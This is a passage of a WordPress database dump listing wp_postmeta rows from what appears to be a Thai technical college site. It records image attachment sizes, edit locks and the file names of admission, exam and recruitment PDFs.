(30392, 12581, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:6912;s:6:\"height\";i:3456;s:4:\"file\";s:36:\"2021/12/png_20220211_215717_0000.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"png_20220211_215717_0000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"png_20220211_215717_0000-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"png_20220211_215717_0000-768x384.png\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"png_20220211_215717_0000-1024x512.png\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"png_20220211_215717_0000-400x200.png\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30393, 12582, '_wp_attached_file', '2021/12/png_20220211_215717_0000-1.png'),
(30394, 12582, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:6912;s:6:\"height\";i:3456;s:4:\"file\";s:38:\"2021/12/png_20220211_215717_0000-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"png_20220211_215717_0000-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"png_20220211_215717_0000-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"png_20220211_215717_0000-1-768x384.png\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"png_20220211_215717_0000-1-1024x512.png\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"png_20220211_215717_0000-1-400x200.png\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30395, 12583, '_wp_attached_file', '2021/12/20220211_222327_0000.png'),
(30396, 12583, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1004;s:6:\"height\";i:591;s:4:\"file\";s:32:\"2021/12/20220211_222327_0000.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"20220211_222327_0000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"20220211_222327_0000-300x177.png\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"20220211_222327_0000-768x452.png\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"20220211_222327_0000-400x235.png\";s:5:\"width\";i:400;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30397, 12584, '_wp_attached_file', '2021/12/20220211_231418_0000.png'),
(30398, 12584, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:32:\"2021/12/20220211_231418_0000.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"20220211_231418_0000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"20220211_231418_0000-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"20220211_231418_0000-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30399, 12585, '_wp_attached_file', '2021/12/327634.jpg'),
(30400, 12585, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1004;s:6:\"height\";i:591;s:4:\"file\";s:18:\"2021/12/327634.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"327634-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"327634-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"327634-768x452.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"327634-400x235.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30401, 12586, '_wp_attached_file', '2021/12/327635.jpg'),
(30402, 12586, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1004;s:6:\"height\";i:591;s:4:\"file\";s:18:\"2021/12/327635.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"327635-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"327635-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"327635-768x452.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"327635-400x235.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30403, 12587, '_wp_attached_file', '2021/12/327636.jpg'),
(30404, 12587, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1004;s:6:\"height\";i:591;s:4:\"file\";s:18:\"2021/12/327636.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"327636-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"327636-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"327636-768x452.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"327636-400x235.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30405, 12588, '_wp_attached_file', '2021/12/327637.jpg'),
(30406, 12588, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1004;s:6:\"height\";i:591;s:4:\"file\";s:18:\"2021/12/327637.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"327637-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"327637-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"327637-768x452.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"327637-400x235.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30407, 12591, '_edit_lock', '1644600481:14'),
(30408, 12591, '_edit_last', '14'),
(30409, 12592, '_wp_attached_file', '2022/02/คำสั่งมอบตัวป.ตรี2565.pdf'),
(30410, 12591, '_hide_featured', NULL),
(30411, 12596, '_edit_lock', '1644600725:14'),
(30412, 12596, '_edit_last', '14'),
(30413, 12597, '_wp_attached_file', '2022/02/ประกาศรายชื่อผ่านการคัดเลือกโควตา-ปริญญา.pdf'),
(30414, 12596, '_hide_featured', NULL),
(30415, 12601, '_edit_lock', '1644601027:14'),
(30416, 12601, '_edit_last', '14'),
(30417, 12602, '_wp_attached_file', '2022/02/เอกสารการมอบตัวนักเรียน-นักศึกษา-โควตา-ปี.pdf'),
(30418, 12601, '_hide_featured', NULL),
(30419, 12607, '_edit_lock', '1644601175:14'),
(30420, 12607, '_edit_last', '14'),
(30421, 12608, '_wp_attached_file', '2022/02/ทล.บ.เครื่องกล.pdf'),
(30422, 12607, '_hide_featured', NULL),
(30423, 12610, '_edit_lock', '1644601561:14'),
(30424, 12610, '_edit_last', '14'),
(30425, 12611, '_edit_lock', '1644601397:14'),
(30426, 12611, '_edit_last', '14'),
(30427, 12612, '_wp_attached_file', '2022/02/ทล.บ.ปิโตร.pdf'),
(30428, 12611, '_hide_featured', NULL),
(30429, 12614, '_edit_lock', '1644601409:14'),
(30430, 12614, '_edit_last', '14'),
(30431, 12615, '_wp_attached_file', '2022/02/ทล.บ.พลังงาน.pdf'),
(30432, 12614, '_hide_featured', NULL),
(30433, 12610, '_hide_featured', NULL),
(30434, 12619, '_edit_lock', '1645067162:14'),
(30435, 12619, '_edit_last', '14'),
(30436, 12620, '_wp_attached_file', '2022/02/ทล.บ.ไฟฟ้า.pdf'),
(30437, 12619, '_hide_featured', NULL),
(30438, 12627, '_wp_attached_file', '2021/12/327641.jpg'),
(30439, 12627, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1810;s:6:\"height\";i:905;s:4:\"file\";s:18:\"2021/12/327641.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"327641-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"327641-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"327641-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"327641-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"327641-400x200.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30440, 12629, '_edit_lock', '1644827558:14'),
(30441, 12629, '_edit_last', '14'),
(30442, 12630, '_wp_attached_file', '2022/02/ประกาศรายชื่อสอบครูพิเศษสอนการตลาด.pdf'),
(30445, 12629, '_hide_featured', NULL),
(30448, 12632, '_edit_lock', '1645076735:14'),
(30449, 12632, '_edit_last', '14'),
(30450, 12632, '_hide_featured', NULL),
(30468, 12215, 'popup_conversion_count', '0'),
(30469, 12215, 'popup_count_reset', 'a:3:{s:9:\"timestamp\";i:1645097040;s:5:\"opens\";i:72536;s:11:\"conversions\";i:0;}'),
(30470, 12215, 'popup_last_conversion', '0'),
(30478, 12652, '_edit_lock', '1645091868:14'),
(30479, 12652, '_edit_last', '14'),
(30482, 12652, '_hide_featured', NULL),
(30504, 12657, '_edit_lock', '1645114554:14'),
(30505, 12657, '_oembed_3d7287888ae0515b758ba065e4d54417', '{{unknown}}'),
(30506, 12657, '_edit_last', '14'),
(30509, 12657, '_hide_featured', NULL),
(30514, 12660, '_wp_attached_file', '2021/12/ประกาศวิทยาลัยเทคนิคระยองเปิดเรียนเทอม-2-.jpg'),
(30515, 12660, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3192;s:6:\"height\";i:4117;s:4:\"file\";s:129:\"2021/12/ประกาศวิทยาลัยเทคนิคระยองเปิดเรียนเทอม-2-.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:129:\"ประกาศวิทยาลัยเทคนิคระยองเปิดเรียนเทอม-2--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:129:\"ประกาศวิทยาลัยเทคนิคระยองเปิดเรียนเทอม-2--233x300.jpg\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:129:\"ประกาศวิทยาลัยเทคนิคระยองเปิดเรียนเทอม-2--768x991.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:991;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:130:\"ประกาศวิทยาลัยเทคนิคระยองเปิดเรียนเทอม-2--794x1024.jpg\";s:5:\"width\";i:794;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:129:\"ประกาศวิทยาลัยเทคนิคระยองเปิดเรียนเทอม-2--233x300.jpg\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30516, 12662, '_edit_lock', '1645176345:14'),
(30517, 12662, '_edit_last', '14'),
(30518, 12663, '_wp_attached_file', '2022/02/ประกาศรับสมัครเจ้าหน้าที่บริหารงานทั่วไป-21-ก.พ.-9-มี.ค.65.pdf'),
(30521, 12662, '_hide_featured', NULL),
(30524, 12668, '_wp_attached_file', '2021/12/ส.png'),
(30525, 12668, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:445;s:4:\"file\";s:15:\"2021/12/ส.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"ส-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"ส-300x167.png\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"ส-768x427.png\";s:5:\"width\";i:768;s:6:\"height\";i:427;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"ส-400x223.png\";s:5:\"width\";i:400;s:6:\"height\";i:223;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30526, 12669, '_wp_attached_file', '2021/12/ช.png'),
(30527, 12669, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:445;s:4:\"file\";s:15:\"2021/12/ช.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"ช-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"ช-300x167.png\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"ช-768x427.png\";s:5:\"width\";i:768;s:6:\"height\";i:427;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"ช-400x223.png\";s:5:\"width\";i:400;s:6:\"height\";i:223;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30528, 12670, '_edit_lock', '1646396906:14'),
(30529, 12670, '_edit_last', '14'),
(30530, 12671, '_wp_attached_file', '2022/03/ประกาศรายชื่อผู้มีสิทธิสอบ-ปวช.pdf'),
(30531, 12670, '_hide_featured', NULL),
(30532, 12673, '_edit_lock', '1646396447:14'),
(30533, 12673, '_edit_last', '14'),
(30534, 12674, '_wp_attached_file', '2022/03/ประกาศรายชื่อผู้มีสิทธิสอบ-ปวส.pdf'),
(30535, 12673, '_hide_featured', NULL),
(30536, 12679, '_wp_attached_file', '2022/03/ประกาศรายชื่อผู้มีสิทธิสอบ-ปวส.แก้ไข.pdf'),
(30537, 12682, '_wp_attached_file', '2022/03/ประกาศรายชื่อผู้มีสิทธิสอบ-ปวช.แก้ไข.pdf'),
(30538, 12685, '_wp_attached_file', '2021/12/20220307_194205_0001.png'),
(30539, 12685, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:32:\"2021/12/20220307_194205_0001.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"20220307_194205_0001-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"20220307_194205_0001-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"20220307_194205_0001-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"20220307_194205_0001-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"20220307_194205_0001-400x225.png\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30540, 12686, '_wp_attached_file', '2021/12/20220307_194205_0000.png'),
(30541, 12686, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:32:\"2021/12/20220307_194205_0000.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"20220307_194205_0000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"20220307_194205_0000-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"20220307_194205_0000-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"20220307_194205_0000-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"20220307_194205_0000-400x225.png\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30542, 12687, '_wp_attached_file', '2021/12/20220307_194205_0000-1.png'),
(30543, 12687, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:34:\"2021/12/20220307_194205_0000-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"20220307_194205_0000-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"20220307_194205_0000-1-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"20220307_194205_0000-1-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"20220307_194205_0000-1-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:34:\"20220307_194205_0000-1-400x225.png\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30544, 12690, '_edit_lock', '1646729783:14'),
(30545, 12690, '_edit_last', '14'),
(30546, 12691, '_wp_attached_file', '2022/03/20220307165014183.pdf'),
(30547, 12690, '_hide_featured', NULL),
(30548, 12698, '_wp_attached_file', '2022/03/20220308145659247.pdf'),
(30549, 12700, '_wp_attached_file', '2022/03/20220308145750765.pdf'),
(30550, 12702, '_edit_lock', '1647229040:12'),
(30551, 12702, '_edit_last', '12');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(30552, 12703, '_wp_attached_file', '2022/03/รับสมัครเจ้าหน้าที่งานบริหารงานทั่วไปแล.pdf'),
(30553, 12702, '_hide_featured', NULL),
(30560, 12709, '_wp_attached_file', '2021/12/1-1.png'),
